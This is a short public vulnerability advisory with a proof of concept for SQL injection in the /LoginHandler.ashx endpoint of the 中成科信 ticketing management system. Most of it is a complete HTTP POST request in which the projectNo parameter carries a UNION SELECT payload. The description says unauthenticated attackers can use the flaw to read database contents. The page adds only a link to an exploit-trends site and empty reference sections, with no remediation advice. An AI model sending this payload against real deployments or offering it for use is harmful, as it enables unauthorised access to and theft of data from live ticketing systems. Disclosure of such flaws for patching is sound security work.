中成科信票务管理系统 /LoginHandler.ashx SQL 注入漏洞

2026-03-27 中成科信票务管理系统 PoC Public

Description

中成科信票务管理系统 /LoginHandler.ashx SQL 注入漏洞 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL 注入漏洞获取数据库中的信息

PoC

POST /LoginHandler.ashx HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

Method=GetSeller&projectNo=1'union+select+1,concat(char(126),char(126),char(77),char(110),char(126),char(126))--+

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities